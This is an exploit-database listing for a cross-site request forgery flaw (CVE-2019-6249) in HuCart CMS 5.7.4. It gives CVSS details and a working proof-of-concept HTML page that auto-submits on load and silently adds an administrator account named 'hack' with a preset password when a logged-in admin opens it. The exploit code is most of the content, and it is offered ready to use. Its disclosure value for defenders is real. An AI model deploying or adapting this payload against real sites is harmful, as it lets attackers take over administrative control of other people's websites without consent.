Hucart CMS 5.7.4 Cross Site Request Forgery

2019.01.15
Credit: AllenChen
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<!-- # Exploit Title: Hucart cms v5.7.4 CSRF vulnerability add administrator account # Date: 2019-01-13 # Exploit Author: AllenCheni1/4520allen@gmail.comi1/4 # Vendor Homepage: http://www.hucart.com/ # Software Link: http://www.hucart.com/ # Version: v5.7.4 # CVE : CVE-2019-6249 An issue was discovered in HuCart v5.7.4. There is a CSRF vulnerability that can add an admin account via /adminsys/index.php?load=admins&act=edit_info&act_type=add.i1/4Referencesi1/4http://www.iwantacve.cn/index.php/archives/109/i1/4 After the administrator logged in, open the csrf exp page. --> <html><body> <script type="text/javascript"> function post(url,fields) { var p = document.createElement("form"); p.action = url; p.innerHTML = fields; p.target = "_self"; p.method = "post"; document.body.appendChild(p); p.submit(); } function csrf_hack() { var fields; fields += "<input type='hidden' name='adm_user' value='hack' />"; fields += "<input type='hidden' name='adm_email' value='admin@hack.com' />"; fields += "<input type='hidden' name='adm_mobile' value='13888888888' />"; fields += "<input type='hidden' name='adm_pwd' value='hack123' />"; fields += "<input type='hidden' name='re_adm_pwd' value='hack123' />"; fields += "<input type='hidden' name='adm_enabled' value='1' />"; fields += "<input type='hidden' name='act_type' value='add' />"; fields += "<input type='hidden' name='adm_id' value='' />"; var url = "http://localhost/hucart_cn/adminsys/index.php?load=admins&act=edit_info&act_type=add"; post(url,fields); } window.onload = function() { csrf_hack();} </script> </body></html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top